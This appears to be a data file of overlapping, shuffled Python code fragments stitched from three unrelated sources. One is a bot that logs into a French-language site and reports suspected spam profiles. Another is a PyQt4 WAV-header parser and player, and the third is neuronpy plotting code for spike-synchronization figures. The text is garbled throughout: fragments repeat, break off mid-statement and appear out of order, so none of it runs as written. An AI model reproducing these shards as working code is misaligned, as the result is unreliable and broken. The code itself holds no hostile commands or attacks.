el.attrs.get(\"name\") in login_form_data: login_form_data[el.attrs.get(\"name\")]", "login_form_data = { \"username\": bot_username, \"password\": <PASSWORD>, } profile_page_url = \"/@\" profile_form_id =", "suspected_usernames: s.headers.update({\"referer\": referer}) profile_page_req = s.get(website+profile_page_url+username) profile_page_req.raise_for_status() referer = profile_page_req.url profile_page_soup = BeautifulSoup(profile_page_req.content,", "login_form = login_page_soup.find(\"form\", action=login_form_url) for el in login_form.find_all(name=True): if \"name\" in el.attrs: if", "= BeautifulSoup(profile_page_req.content, \"lxml\") profile_form = profile_page_soup.find(\"form\", id=profile_form_id) profile_form_url = profile_form.attrs.get(\"action\") for el in", "not el.attrs.get(\"name\") in login_form_data: login_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) login_auth_req = s.post(website+login_form_url, data=login_form_data)", "s.get(website+login_page_url) login_page_req.raise_for_status() referer = login_page_req.url login_page_soup = BeautifulSoup(login_page_req.content, \"lxml\") login_form = login_page_soup.find(\"form\", action=login_form_url)", "login_auth_req = s.post(website+login_form_url, data=login_form_data) login_auth_req.raise_for_status() referer = login_auth_req.url # Sending alerts for username", "login_form_url = \"/membres/connexion/?next=/\" login_form_data = { \"username\": bot_username, \"password\": <PASSWORD>, } profile_page_url =", "profile_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\") in profile_form_data: profile_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\")", "BeautifulSoup(profile_page_req.content, \"lxml\") profile_form = profile_page_soup.find(\"form\", id=profile_form_id) profile_form_url = profile_form.attrs.get(\"action\") for el in profile_form.find_all(name=True):", "\"name\" in el.attrs: if not 
el.attrs.get(\"name\") in profile_form_data: profile_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer})", "suspected_usernames): login_page_url = \"/membres/connexion/\" login_form_url = \"/membres/connexion/?next=/\" login_form_data = { \"username\": bot_username, \"password\":", "\"name\" in el.attrs: if not el.attrs.get(\"name\") in login_form_data: login_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer})", "profile_form.attrs.get(\"action\") for el in profile_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\") in", "profile_form_data = { \"reason\": \"Spam potentiel\" } s = requests.session() # Bot login", "el.attrs.get(\"name\") in profile_form_data: profile_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) profile_alert_req = s.post(website+profile_form_url, data=profile_form_data) profile_alert_req.raise_for_status()", "\"/membres/connexion/\" login_form_url = \"/membres/connexion/?next=/\" login_form_data = { \"username\": bot_username, \"password\": <PASSWORD>, } profile_page_url", "\"password\": <PASSWORD>, } profile_page_url = \"/@\" profile_form_id = \"report-profile\" profile_form_data = { \"reason\":", "\"report-profile\" profile_form_data = { \"reason\": \"Spam potentiel\" } s = requests.session() # Bot", "= BeautifulSoup(login_page_req.content, \"lxml\") login_form = login_page_soup.find(\"form\", action=login_form_url) for el in login_form.find_all(name=True): if \"name\"", "profile_page_soup.find(\"form\", id=profile_form_id) profile_form_url = profile_form.attrs.get(\"action\") for el in profile_form.find_all(name=True): if \"name\" in el.attrs:", "profile_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) profile_alert_req = s.post(website+profile_form_url, data=profile_form_data) profile_alert_req.raise_for_status() 
referer = profile_alert_req.url", "<PASSWORD>, } profile_page_url = \"/@\" profile_form_id = \"report-profile\" profile_form_data = { \"reason\": \"Spam" ]
[ "struct.unpack('<h', fh.read(2))[0] == 1, 'This is not a PCM wave file, not supported'", "class QtWavSong(Song): def __init__(self, path): super(QtWavSong, self).__init__(path) # parse the file header #", "data is UInt8 or Int16 format.setSampleType({8: QAudioFormat.UnSignedInt, 16: QAudioFormat.SignedInt}[bitsPerSample]) # ensure we can", "file, not supported' numChannels = struct.unpack('<h', fh.read(2))[0] sampleRate = struct.unpack('<i', fh.read(4))[0] fh.read(4) #", "not supported' assert struct.unpack('<h', fh.read(2))[0] == 1, 'This is not a PCM wave", "', 'This is not a wave file' assert struct.unpack('<i', fh.read(4))[0] == 16, 'This", "store info for seeking self.chunkSize = numChannels * bitsPerSample / 8 self.sampleRate =", "bitsPerSample = struct.unpack('<h', fh.read(2))[0] assert bitsPerSample in (8, 16) assert fh.read(4) == 'data',", "QAudioOutput(format, None) self.audioFile = QFile(path) self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile) def seekAndPlay(self, seconds): self.audioFile.seek(int(seconds * self.sampleRate)", "a PCM wave file, not supported' numChannels = struct.unpack('<h', fh.read(2))[0] sampleRate = struct.unpack('<i',", "== 16, 'This is not a PCM wave file, not supported' assert struct.unpack('<h',", "format.setByteOrder(QAudioFormat.LittleEndian) # According to the wave format spec the bitsPerSample determins if data", "fh.read(4) == 'WAVE', 'This is not a wave file' assert fh.read(4) == 'fmt", "file size in bytes, ignore assert fh.read(4) == 'WAVE', 'This is not a", "with open(path, 'rb') as fh: assert fh.read(4) == 'RIFF', 'This is not a", "file' assert struct.unpack('<i', fh.read(4))[0] == 16, 'This is not a PCM wave file,", "== 'fmt ', 'This is not a wave file' assert struct.unpack('<i', fh.read(4))[0] ==", "PCM wave file header.' 
fh.read(4) # sample data size self.waveDataOffset = fh.tell() #", "struct.unpack('<i', fh.read(4))[0] fh.read(4) # byteRate fh.read(2) # blockAlign bitsPerSample = struct.unpack('<h', fh.read(2))[0] assert", "format spec the bitsPerSample determins if data is UInt8 or Int16 format.setSampleType({8: QAudioFormat.UnSignedInt,", "the file header # http://soundfile.sapp.org/doc/WaveFormat/ with open(path, 'rb') as fh: assert fh.read(4) ==", "as fh: assert fh.read(4) == 'RIFF', 'This is not a wave file' fh.read(4)", "# According to the wave format spec the bitsPerSample determins if data is", "not a PCM wave file, not supported' assert struct.unpack('<h', fh.read(2))[0] == 1, 'This", "def seekAndPlay(self, seconds): self.audioFile.seek(int(seconds * self.sampleRate) * self.chunkSize + self.waveDataOffset) self.output.start(self.audioFile) def stop(self):", "= QAudioFormat() format.setSampleRate(sampleRate) format.setChannels(numChannels) format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian) # According to the wave format", "According to the wave format spec the bitsPerSample determins if data is UInt8", "seekAndPlay(self, seconds): self.audioFile.seek(int(seconds * self.sampleRate) * self.chunkSize + self.waveDataOffset) self.output.start(self.audioFile) def stop(self): self.output.stop()", "self).__init__(path) # parse the file header # http://soundfile.sapp.org/doc/WaveFormat/ with open(path, 'rb') as fh:", "struct.unpack('<h', fh.read(2))[0] assert bitsPerSample in (8, 16) assert fh.read(4) == 'data', 'Additional bytes", "= struct.unpack('<i', fh.read(4))[0] fh.read(4) # byteRate fh.read(2) # blockAlign bitsPerSample = struct.unpack('<h', fh.read(2))[0]", "struct class QtWavSong(Song): def __init__(self, path): super(QtWavSong, self).__init__(path) # parse the file header", "this data device = QAudioDeviceInfo.defaultOutputDevice() assert device.isFormatSupported(format) self.output = QAudioOutput(format, 
None) self.audioFile =", "size self.waveDataOffset = fh.tell() # sample data start # store info for seeking", "import * from audioLibs.base import Song from PyQt4.QtMultimedia import * import struct class", "determins if data is UInt8 or Int16 format.setSampleType({8: QAudioFormat.UnSignedInt, 16: QAudioFormat.SignedInt}[bitsPerSample]) # ensure", "fh.read(4))[0] == 16, 'This is not a PCM wave file, not supported' assert", "import Song from PyQt4.QtMultimedia import * import struct class QtWavSong(Song): def __init__(self, path):", "import struct class QtWavSong(Song): def __init__(self, path): super(QtWavSong, self).__init__(path) # parse the file", "== 'RIFF', 'This is not a wave file' fh.read(4) # file size in", "a wave file' assert fh.read(4) == 'fmt ', 'This is not a wave", "wave file, not supported' numChannels = struct.unpack('<h', fh.read(2))[0] sampleRate = struct.unpack('<i', fh.read(4))[0] fh.read(4)", "16) assert fh.read(4) == 'data', 'Additional bytes found in PCM wave file header.'", "self.sampleRate = sampleRate # convert to format format = QAudioFormat() format.setSampleRate(sampleRate) format.setChannels(numChannels) format.setSampleSize(bitsPerSample)", "not supported' numChannels = struct.unpack('<h', fh.read(2))[0] sampleRate = struct.unpack('<i', fh.read(4))[0] fh.read(4) # byteRate", "a PCM wave file, not supported' assert struct.unpack('<h', fh.read(2))[0] == 1, 'This is", "fh.read(4))[0] fh.read(4) # byteRate fh.read(2) # blockAlign bitsPerSample = struct.unpack('<h', fh.read(2))[0] assert bitsPerSample", "the bitsPerSample determins if data is UInt8 or Int16 format.setSampleType({8: QAudioFormat.UnSignedInt, 16: QAudioFormat.SignedInt}[bitsPerSample])", "from PyQt4.QtMultimedia import * import struct class QtWavSong(Song): def __init__(self, path): super(QtWavSong, self).__init__(path)", "format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian) # According to the wave format spec the bitsPerSample determins if", "* 
bitsPerSample / 8 self.sampleRate = sampleRate # convert to format format =", "in (8, 16) assert fh.read(4) == 'data', 'Additional bytes found in PCM wave", "bytes, ignore assert fh.read(4) == 'WAVE', 'This is not a wave file' assert", "__init__(self, path): super(QtWavSong, self).__init__(path) # parse the file header # http://soundfile.sapp.org/doc/WaveFormat/ with open(path,", "not a wave file' assert struct.unpack('<i', fh.read(4))[0] == 16, 'This is not a", "data start # store info for seeking self.chunkSize = numChannels * bitsPerSample /", "16: QAudioFormat.SignedInt}[bitsPerSample]) # ensure we can play this data device = QAudioDeviceInfo.defaultOutputDevice() assert", "# byteRate fh.read(2) # blockAlign bitsPerSample = struct.unpack('<h', fh.read(2))[0] assert bitsPerSample in (8,", "assert fh.read(4) == 'data', 'Additional bytes found in PCM wave file header.' fh.read(4)", "data size self.waveDataOffset = fh.tell() # sample data start # store info for", "QFile(path) self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile) def seekAndPlay(self, seconds): self.audioFile.seek(int(seconds * self.sampleRate) * self.chunkSize + self.waveDataOffset)", "QAudioFormat.SignedInt}[bitsPerSample]) # ensure we can play this data device = QAudioDeviceInfo.defaultOutputDevice() assert device.isFormatSupported(format)", "or Int16 format.setSampleType({8: QAudioFormat.UnSignedInt, 16: QAudioFormat.SignedInt}[bitsPerSample]) # ensure we can play this data", "http://soundfile.sapp.org/doc/WaveFormat/ with open(path, 'rb') as fh: assert fh.read(4) == 'RIFF', 'This is not", "is not a PCM wave file, not supported' assert struct.unpack('<h', fh.read(2))[0] == 1,", "fh.tell() # sample data start # store info for seeking self.chunkSize = numChannels", "Song from PyQt4.QtMultimedia import * import struct class QtWavSong(Song): def __init__(self, path): super(QtWavSong,", "supported' numChannels = struct.unpack('<h', fh.read(2))[0] sampleRate = struct.unpack('<i', 
fh.read(4))[0] fh.read(4) # byteRate fh.read(2)", "byteRate fh.read(2) # blockAlign bitsPerSample = struct.unpack('<h', fh.read(2))[0] assert bitsPerSample in (8, 16)", "wave file' fh.read(4) # file size in bytes, ignore assert fh.read(4) == 'WAVE',", "= struct.unpack('<h', fh.read(2))[0] sampleRate = struct.unpack('<i', fh.read(4))[0] fh.read(4) # byteRate fh.read(2) # blockAlign", "* from audioLibs.base import Song from PyQt4.QtMultimedia import * import struct class QtWavSong(Song):", "fh.read(4) == 'fmt ', 'This is not a wave file' assert struct.unpack('<i', fh.read(4))[0]", "file header.' fh.read(4) # sample data size self.waveDataOffset = fh.tell() # sample data", "format.setSampleRate(sampleRate) format.setChannels(numChannels) format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian) # According to the wave format spec the", "to the wave format spec the bitsPerSample determins if data is UInt8 or", "None) self.audioFile = QFile(path) self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile) def seekAndPlay(self, seconds): self.audioFile.seek(int(seconds * self.sampleRate) *", "numChannels = struct.unpack('<h', fh.read(2))[0] sampleRate = struct.unpack('<i', fh.read(4))[0] fh.read(4) # byteRate fh.read(2) #", "sampleRate = struct.unpack('<i', fh.read(4))[0] fh.read(4) # byteRate fh.read(2) # blockAlign bitsPerSample = struct.unpack('<h',", "open(path, 'rb') as fh: assert fh.read(4) == 'RIFF', 'This is not a wave", "self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile) def seekAndPlay(self, seconds): self.audioFile.seek(int(seconds * self.sampleRate) * self.chunkSize + self.waveDataOffset) self.output.start(self.audioFile)", "self.output.start(self.audioFile) def seekAndPlay(self, seconds): self.audioFile.seek(int(seconds * self.sampleRate) * self.chunkSize + self.waveDataOffset) self.output.start(self.audioFile) def", "audioLibs.base import Song from 
PyQt4.QtMultimedia import * import struct class QtWavSong(Song): def __init__(self,", "Int16 format.setSampleType({8: QAudioFormat.UnSignedInt, 16: QAudioFormat.SignedInt}[bitsPerSample]) # ensure we can play this data device", "the wave format spec the bitsPerSample determins if data is UInt8 or Int16", "blockAlign bitsPerSample = struct.unpack('<h', fh.read(2))[0] assert bitsPerSample in (8, 16) assert fh.read(4) ==", "if data is UInt8 or Int16 format.setSampleType({8: QAudioFormat.UnSignedInt, 16: QAudioFormat.SignedInt}[bitsPerSample]) # ensure we", "assert device.isFormatSupported(format) self.output = QAudioOutput(format, None) self.audioFile = QFile(path) self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile) def seekAndPlay(self,", "format.setSampleType({8: QAudioFormat.UnSignedInt, 16: QAudioFormat.SignedInt}[bitsPerSample]) # ensure we can play this data device =", "= QAudioDeviceInfo.defaultOutputDevice() assert device.isFormatSupported(format) self.output = QAudioOutput(format, None) self.audioFile = QFile(path) self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile)", "assert struct.unpack('<i', fh.read(4))[0] == 16, 'This is not a PCM wave file, not", "wave file' assert struct.unpack('<i', fh.read(4))[0] == 16, 'This is not a PCM wave", "file' fh.read(4) # file size in bytes, ignore assert fh.read(4) == 'WAVE', 'This", "'WAVE', 'This is not a wave file' assert fh.read(4) == 'fmt ', 'This", "from qtutil import * from audioLibs.base import Song from PyQt4.QtMultimedia import * import", "wave file header.' 
fh.read(4) # sample data size self.waveDataOffset = fh.tell() # sample", "is not a wave file' fh.read(4) # file size in bytes, ignore assert", "device.isFormatSupported(format) self.output = QAudioOutput(format, None) self.audioFile = QFile(path) self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile) def seekAndPlay(self, seconds):", "import * import struct class QtWavSong(Song): def __init__(self, path): super(QtWavSong, self).__init__(path) # parse", "= QFile(path) self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile) def seekAndPlay(self, seconds): self.audioFile.seek(int(seconds * self.sampleRate) * self.chunkSize +", "= struct.unpack('<h', fh.read(2))[0] assert bitsPerSample in (8, 16) assert fh.read(4) == 'data', 'Additional", "UInt8 or Int16 format.setSampleType({8: QAudioFormat.UnSignedInt, 16: QAudioFormat.SignedInt}[bitsPerSample]) # ensure we can play this", "struct.unpack('<h', fh.read(2))[0] sampleRate = struct.unpack('<i', fh.read(4))[0] fh.read(4) # byteRate fh.read(2) # blockAlign bitsPerSample", "device = QAudioDeviceInfo.defaultOutputDevice() assert device.isFormatSupported(format) self.output = QAudioOutput(format, None) self.audioFile = QFile(path) self.audioFile.open(QIODevice.ReadOnly)", "convert to format format = QAudioFormat() format.setSampleRate(sampleRate) format.setChannels(numChannels) format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian) # According", "= QAudioOutput(format, None) self.audioFile = QFile(path) self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile) def seekAndPlay(self, seconds): self.audioFile.seek(int(seconds *", "fh.read(4) == 'data', 'Additional bytes found in PCM wave file header.' 
fh.read(4) #", "assert bitsPerSample in (8, 16) assert fh.read(4) == 'data', 'Additional bytes found in", "is UInt8 or Int16 format.setSampleType({8: QAudioFormat.UnSignedInt, 16: QAudioFormat.SignedInt}[bitsPerSample]) # ensure we can play", "in bytes, ignore assert fh.read(4) == 'WAVE', 'This is not a wave file'", "'This is not a PCM wave file, not supported' numChannels = struct.unpack('<h', fh.read(2))[0]", "found in PCM wave file header.' fh.read(4) # sample data size self.waveDataOffset =", "assert fh.read(4) == 'WAVE', 'This is not a wave file' assert fh.read(4) ==", "not a PCM wave file, not supported' numChannels = struct.unpack('<h', fh.read(2))[0] sampleRate =", "self.audioFile = QFile(path) self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile) def seekAndPlay(self, seconds): self.audioFile.seek(int(seconds * self.sampleRate) * self.chunkSize", "'data', 'Additional bytes found in PCM wave file header.' fh.read(4) # sample data", "wave file, not supported' assert struct.unpack('<h', fh.read(2))[0] == 1, 'This is not a", "sampleRate # convert to format format = QAudioFormat() format.setSampleRate(sampleRate) format.setChannels(numChannels) format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian)", "# convert to format format = QAudioFormat() format.setSampleRate(sampleRate) format.setChannels(numChannels) format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian) #", "= numChannels * bitsPerSample / 8 self.sampleRate = sampleRate # convert to format", "/ 8 self.sampleRate = sampleRate # convert to format format = QAudioFormat() format.setSampleRate(sampleRate)", "(8, 16) assert fh.read(4) == 'data', 'Additional bytes found in PCM wave file", "bitsPerSample determins if data is UInt8 or Int16 format.setSampleType({8: QAudioFormat.UnSignedInt, 16: QAudioFormat.SignedInt}[bitsPerSample]) #", "# 
http://soundfile.sapp.org/doc/WaveFormat/ with open(path, 'rb') as fh: assert fh.read(4) == 'RIFF', 'This is", "size in bytes, ignore assert fh.read(4) == 'WAVE', 'This is not a wave", "'This is not a wave file' assert struct.unpack('<i', fh.read(4))[0] == 16, 'This is", "seeking self.chunkSize = numChannels * bitsPerSample / 8 self.sampleRate = sampleRate # convert", "= sampleRate # convert to format format = QAudioFormat() format.setSampleRate(sampleRate) format.setChannels(numChannels) format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\")", "a wave file' fh.read(4) # file size in bytes, ignore assert fh.read(4) ==", "fh.read(4) == 'RIFF', 'This is not a wave file' fh.read(4) # file size", "file header # http://soundfile.sapp.org/doc/WaveFormat/ with open(path, 'rb') as fh: assert fh.read(4) == 'RIFF',", "format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian) # According to the wave format spec the bitsPerSample determins", "wave format spec the bitsPerSample determins if data is UInt8 or Int16 format.setSampleType({8:", "is not a wave file' assert struct.unpack('<i', fh.read(4))[0] == 16, 'This is not", "assert fh.read(4) == 'fmt ', 'This is not a wave file' assert struct.unpack('<i',", "# file size in bytes, ignore assert fh.read(4) == 'WAVE', 'This is not", "* import struct class QtWavSong(Song): def __init__(self, path): super(QtWavSong, self).__init__(path) # parse the", "qtutil import * from audioLibs.base import Song from PyQt4.QtMultimedia import * import struct", "8 self.sampleRate = sampleRate # convert to format format = QAudioFormat() format.setSampleRate(sampleRate) format.setChannels(numChannels)", "to format format = QAudioFormat() format.setSampleRate(sampleRate) format.setChannels(numChannels) format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian) # According to", "not a wave file' assert fh.read(4) == 'fmt ', 'This 
is not a", "PyQt4.QtMultimedia import * import struct class QtWavSong(Song): def __init__(self, path): super(QtWavSong, self).__init__(path) #", "'This is not a wave file' assert fh.read(4) == 'fmt ', 'This is", "can play this data device = QAudioDeviceInfo.defaultOutputDevice() assert device.isFormatSupported(format) self.output = QAudioOutput(format, None)", "== 1, 'This is not a PCM wave file, not supported' numChannels =", "format format = QAudioFormat() format.setSampleRate(sampleRate) format.setChannels(numChannels) format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian) # According to the", "wave file' assert fh.read(4) == 'fmt ', 'This is not a wave file'", "fh.read(4) # file size in bytes, ignore assert fh.read(4) == 'WAVE', 'This is", "'RIFF', 'This is not a wave file' fh.read(4) # file size in bytes,", "not a wave file' fh.read(4) # file size in bytes, ignore assert fh.read(4)", "'This is not a wave file' fh.read(4) # file size in bytes, ignore", "struct.unpack('<i', fh.read(4))[0] == 16, 'This is not a PCM wave file, not supported'", "info for seeking self.chunkSize = numChannels * bitsPerSample / 8 self.sampleRate = sampleRate", "self.chunkSize = numChannels * bitsPerSample / 8 self.sampleRate = sampleRate # convert to", "== 'WAVE', 'This is not a wave file' assert fh.read(4) == 'fmt ',", "format.setChannels(numChannels) format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian) # According to the wave format spec the bitsPerSample", "bitsPerSample in (8, 16) assert fh.read(4) == 'data', 'Additional bytes found in PCM", "PCM wave file, not supported' numChannels = struct.unpack('<h', fh.read(2))[0] sampleRate = struct.unpack('<i', fh.read(4))[0]", "for seeking self.chunkSize = numChannels * bitsPerSample / 8 self.sampleRate = sampleRate #", "# blockAlign bitsPerSample = struct.unpack('<h', fh.read(2))[0] assert bitsPerSample in (8, 16) 
assert fh.read(4)", "is not a PCM wave file, not supported' numChannels = struct.unpack('<h', fh.read(2))[0] sampleRate", "numChannels * bitsPerSample / 8 self.sampleRate = sampleRate # convert to format format", "file' assert fh.read(4) == 'fmt ', 'This is not a wave file' assert", "fh.read(2))[0] sampleRate = struct.unpack('<i', fh.read(4))[0] fh.read(4) # byteRate fh.read(2) # blockAlign bitsPerSample =", "'This is not a PCM wave file, not supported' assert struct.unpack('<h', fh.read(2))[0] ==", "assert fh.read(4) == 'RIFF', 'This is not a wave file' fh.read(4) # file", "1, 'This is not a PCM wave file, not supported' numChannels = struct.unpack('<h',", "sample data start # store info for seeking self.chunkSize = numChannels * bitsPerSample", "format = QAudioFormat() format.setSampleRate(sampleRate) format.setChannels(numChannels) format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian) # According to the wave", "file, not supported' assert struct.unpack('<h', fh.read(2))[0] == 1, 'This is not a PCM", "QtWavSong(Song): def __init__(self, path): super(QtWavSong, self).__init__(path) # parse the file header # http://soundfile.sapp.org/doc/WaveFormat/", "16, 'This is not a PCM wave file, not supported' assert struct.unpack('<h', fh.read(2))[0]", "= fh.tell() # sample data start # store info for seeking self.chunkSize =", "spec the bitsPerSample determins if data is UInt8 or Int16 format.setSampleType({8: QAudioFormat.UnSignedInt, 16:", "ignore assert fh.read(4) == 'WAVE', 'This is not a wave file' assert fh.read(4)", "== 'data', 'Additional bytes found in PCM wave file header.' fh.read(4) # sample", "bytes found in PCM wave file header.' 
fh.read(4) # sample data size self.waveDataOffset", "# parse the file header # http://soundfile.sapp.org/doc/WaveFormat/ with open(path, 'rb') as fh: assert", "fh.read(2))[0] == 1, 'This is not a PCM wave file, not supported' numChannels", "# sample data size self.waveDataOffset = fh.tell() # sample data start # store", "fh: assert fh.read(4) == 'RIFF', 'This is not a wave file' fh.read(4) #", "'rb') as fh: assert fh.read(4) == 'RIFF', 'This is not a wave file'", "a wave file' assert struct.unpack('<i', fh.read(4))[0] == 16, 'This is not a PCM", "super(QtWavSong, self).__init__(path) # parse the file header # http://soundfile.sapp.org/doc/WaveFormat/ with open(path, 'rb') as", "'Additional bytes found in PCM wave file header.' fh.read(4) # sample data size", "# store info for seeking self.chunkSize = numChannels * bitsPerSample / 8 self.sampleRate", "fh.read(4) # byteRate fh.read(2) # blockAlign bitsPerSample = struct.unpack('<h', fh.read(2))[0] assert bitsPerSample in", "is not a wave file' assert fh.read(4) == 'fmt ', 'This is not", "play this data device = QAudioDeviceInfo.defaultOutputDevice() assert device.isFormatSupported(format) self.output = QAudioOutput(format, None) self.audioFile", "fh.read(4) # sample data size self.waveDataOffset = fh.tell() # sample data start #", "header.' 
fh.read(4) # sample data size self.waveDataOffset = fh.tell() # sample data start", "self.waveDataOffset = fh.tell() # sample data start # store info for seeking self.chunkSize", "parse the file header # http://soundfile.sapp.org/doc/WaveFormat/ with open(path, 'rb') as fh: assert fh.read(4)", "QAudioFormat() format.setSampleRate(sampleRate) format.setChannels(numChannels) format.setSampleSize(bitsPerSample) format.setCodec(\"audio/pcm\") format.setByteOrder(QAudioFormat.LittleEndian) # According to the wave format spec", "fh.read(2))[0] assert bitsPerSample in (8, 16) assert fh.read(4) == 'data', 'Additional bytes found", "self.output = QAudioOutput(format, None) self.audioFile = QFile(path) self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile) def seekAndPlay(self, seconds): self.audioFile.seek(int(seconds", "fh.read(2) # blockAlign bitsPerSample = struct.unpack('<h', fh.read(2))[0] assert bitsPerSample in (8, 16) assert", "start # store info for seeking self.chunkSize = numChannels * bitsPerSample / 8", "ensure we can play this data device = QAudioDeviceInfo.defaultOutputDevice() assert device.isFormatSupported(format) self.output =", "from audioLibs.base import Song from PyQt4.QtMultimedia import * import struct class QtWavSong(Song): def", "PCM wave file, not supported' assert struct.unpack('<h', fh.read(2))[0] == 1, 'This is not", "QAudioFormat.UnSignedInt, 16: QAudioFormat.SignedInt}[bitsPerSample]) # ensure we can play this data device = QAudioDeviceInfo.defaultOutputDevice()", "'fmt ', 'This is not a wave file' assert struct.unpack('<i', fh.read(4))[0] == 16,", "sample data size self.waveDataOffset = fh.tell() # sample data start # store info", "path): super(QtWavSong, self).__init__(path) # parse the file header # http://soundfile.sapp.org/doc/WaveFormat/ with open(path, 'rb')", "QAudioDeviceInfo.defaultOutputDevice() assert device.isFormatSupported(format) self.output = QAudioOutput(format, None) self.audioFile = QFile(path) 
self.audioFile.open(QIODevice.ReadOnly) self.output.start(self.audioFile) def", "we can play this data device = QAudioDeviceInfo.defaultOutputDevice() assert device.isFormatSupported(format) self.output = QAudioOutput(format,", "in PCM wave file header.' fh.read(4) # sample data size self.waveDataOffset = fh.tell()", "data device = QAudioDeviceInfo.defaultOutputDevice() assert device.isFormatSupported(format) self.output = QAudioOutput(format, None) self.audioFile = QFile(path)", "supported' assert struct.unpack('<h', fh.read(2))[0] == 1, 'This is not a PCM wave file,", "def __init__(self, path): super(QtWavSong, self).__init__(path) # parse the file header # http://soundfile.sapp.org/doc/WaveFormat/ with", "assert struct.unpack('<h', fh.read(2))[0] == 1, 'This is not a PCM wave file, not", "# sample data start # store info for seeking self.chunkSize = numChannels *", "bitsPerSample / 8 self.sampleRate = sampleRate # convert to format format = QAudioFormat()", "# ensure we can play this data device = QAudioDeviceInfo.defaultOutputDevice() assert device.isFormatSupported(format) self.output", "header # http://soundfile.sapp.org/doc/WaveFormat/ with open(path, 'rb') as fh: assert fh.read(4) == 'RIFF', 'This" ]
[ "dtype=int)) ax.set_xlabel('lag (ms)') ax.set_ylim(ylim) ax.set_ylabel('Synchronization magnitude') def draw_cell(cellid, ax, color='black'): xloc = 10+cellid*20", "import * from neuronpy.util import spiketrain from params import sim_var homedir = os.path.join(os.path.relpath('..'))", "= [10,30,50,70,90] ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance in microns') ax.set_ylim((-5,11)) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.set_yticks([]) ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black')", "\\ bbox_to_anchor=(0, 1.15, 1., .102), loc=1, ncol=3, mode=\"expand\", \\ borderaxespad=0., handletextpad=.2) # Mark", "(10+pair[0]*20, cluster_width, 1, pair) # pos2 = (10+pair[1]*20, cluster_width, 1, pair) # stim_odor_mags", "1, pair) # stim_odor_mags = numpy.ones(5)*.55 fig = pyplot.figure(figsize=(9.5,5.7)) raster_ax = fig.add_axes([.1,.1,.8,.27]) schematic_ax", ".5), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(breath_events[i]+7.5, .28, \\ 'delay 0-15 ms',", "def draw_cell(cellid, ax, color='black'): xloc = 10+cellid*20 # Lateral dends y = numpy.abs(numpy.subtract(range(101),", "'A)', transform=fig.transFigure, verticalalignment='baseline') pos = syn_ax.get_position() syn_ax.text(.025, pos.ymax+.07, 'B)', transform=fig.transFigure, verticalalignment='baseline') pos =", "breathplt = syn_ax.plot([breath, breath], [0,2], linestyle='--', \\ color='gray', linewidth=2) syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([]) syn_ax.set_xticks([])", "color='blue') idx += 1 raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple', \\ horizontalalignment='center', verticalalignment='center', fontsize=11) raster_ax.set_yticks([]) ylim", "ax.set_yticks([]) ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom') def read_weightevents(): M = 
